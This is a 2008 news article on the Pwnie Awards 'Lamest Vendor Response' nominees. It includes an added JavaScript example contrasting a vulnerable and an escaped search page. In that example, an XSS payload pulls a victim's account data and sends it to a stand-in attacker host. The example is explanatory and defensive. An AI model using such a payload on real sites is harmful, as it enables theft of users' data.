The final nominations have been released to the public

Jul 22, 2008 08:43 GMT  ·  By

The Pwnie Awards are all about celebrating the greatest achievements and the most notable failures in the security industry. This year the awards committee had to pick 37 nominees out of a list of 134 submissions, and then place each of them in the proper category (there are 9 award categories in total). The winners of each category will be announced at the Black Hat USA conference, which will be held in Las Vegas on the 6th of August.

"We've received some really good submissions and it was not an easy task to narrow them down to five nominees per category, but we hope that we've done a good job. The next step: the Pwnie Awards judges will gather in an undisclosed location prior to the award ceremony and vote on the winners," says the Pwnie team.

The nominees in the "Lamest Vendor Response" category are: McAfee, Linus Torvalds, Wonderware and NXP Semiconductors. These nominees made it into this category because of the "spectacular" way they handled various security issues.

McAfee and XSS vulnerabilities

McAfee's ScanAlert service had certified some 60 websites as "Hacker Safe" even though they contained cross-site scripting (XSS) vulnerabilities that made them anything but safe. Ironically, ScanAlert's own site was vulnerable too, but the most remarkable part of the incident is the statement issued by Joseph Pierini, director of enterprise services: "Cross-site scripting can't be used to hack a server. You may be able to do other things with it. You may be able to do things that affect the end-user or the client. But the customer data protected with the server, in the database, isn't going to be compromised by a cross-site scripting attack, not directly." What that statement misses is how XSS is actually used: the injected script runs in the victim's browser with the victim's session cookies, so it can issue authenticated requests to the very server being defended and read or change whatever that user is allowed to, which includes the customer data he mentions.
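To make the point concrete, here is an added example (not code from the article, from McAfee or from ScanAlert): a minimal reflected-XSS sink next to its hardened form, and a constructed payload of the kind that turns "affects the end-user" into a request for that user's account data. The search endpoint, the /account path, the attacker host and the payload are all assumptions for illustration.

```javascript
// Added example: reflected XSS in a search page, vulnerable and hardened.
// Endpoint names, the /account path and attacker.example are hypothetical.

// Vulnerable: the untrusted search term is concatenated straight into HTML,
// so a term containing markup becomes part of the page and is executed.
function renderSearchVulnerable(term) {
  return `<h1>Results for: ${term}</h1>`;
}

// Escape the five characters that let text break out of an HTML text node
// or a quoted attribute value.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;',
    '<': '&lt;',
    '>': '&gt;',
    '"': '&quot;',
    "'": '&#39;',
  })[c]);
}

// Hardened: every untrusted value is escaped at the point it enters HTML.
function renderSearchSafe(term) {
  return `<h1>Results for: ${escapeHtml(term)}</h1>`;
}

// Constructed payload. When the vulnerable page is served to a logged-in
// victim, this runs in the victim's browser with the victim's cookies, so the
// fetch() of /account is an authenticated same-origin request; the response
// (the customer's own data, straight from the server's database) is then
// shipped to the attacker. Nothing here "hacks the server" and it does not
// need to.
const PAYLOAD =
  `<script>fetch('/account',{credentials:'include'})` +
  `.then(r=>r.text())` +
  `.then(t=>navigator.sendBeacon('https://attacker.example/c',t))</script>`;

// True when the rendered page still contains a live <script> tag, i.e. the
// payload survived rendering and would execute in a browser.
function containsLiveScript(html) {
  return /<script\b[^>]*>/i.test(html);
}

// Render the same payload through both versions and report whether it survives.
function demo() {
  return {
    vulnerable: containsLiveScript(renderSearchVulnerable(PAYLOAD)), // true
    safe: containsLiveScript(renderSearchSafe(PAYLOAD)),             // false
  };
}

console.log(demo());
```

The hardened version does nothing clever: it escapes output in the one place untrusted data meets HTML, and the payload arrives in the page as inert text. A scanner that certifies a site "Hacker Safe" while this difference is still missing on it is certifying the wrong thing.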

Linus Torvalds and the silent patching policy

If you were wondering why Linus Torvalds made it into this category, here is what he had to say about security bugs: "So I personally consider security bugs to be just "normal bugs". I don't cover them up, but I also don't have any reason what-so-ever to think it's a good idea to track them and announce them as something special. One reason I refuse to bother with the whole security circus is that I think it glorifies - and thus encourages - the wrong behavior."

Wonderware and the SCADA DoS vulnerability

Core Security found a denial-of-service (DoS) vulnerability in one of Wonderware's SCADA products and disclosed it. The thing is that Wonderware took an incredibly long time to respond, and initially would not even acknowledge that the software was vulnerable. The way Wonderware handled the situation has been deemed "incompetent" by the awards committee and by the security industry.

NXP and the Radboud University Researchers

Two researchers from Radboud University showed that the security of the Mifare Classic chip, the RFID chip used in London's Oyster card among many other contactless cards, could be broken. NXP decided that the only way to stop Wouter Teepe and Bart Jacobs from publishing their paper "Dismantling Mifare Classic" was to sue the university. Fortunately, a court recently ruled in favour of the researchers.

The other eight awards categories are: Best Server-Side Bug, Best Client-Side Bug, Mass 0wnage, Most Innovative Research, Most Overhyped Bug, Best Song, Most Epic Fail, and Lifetime Achievement Award.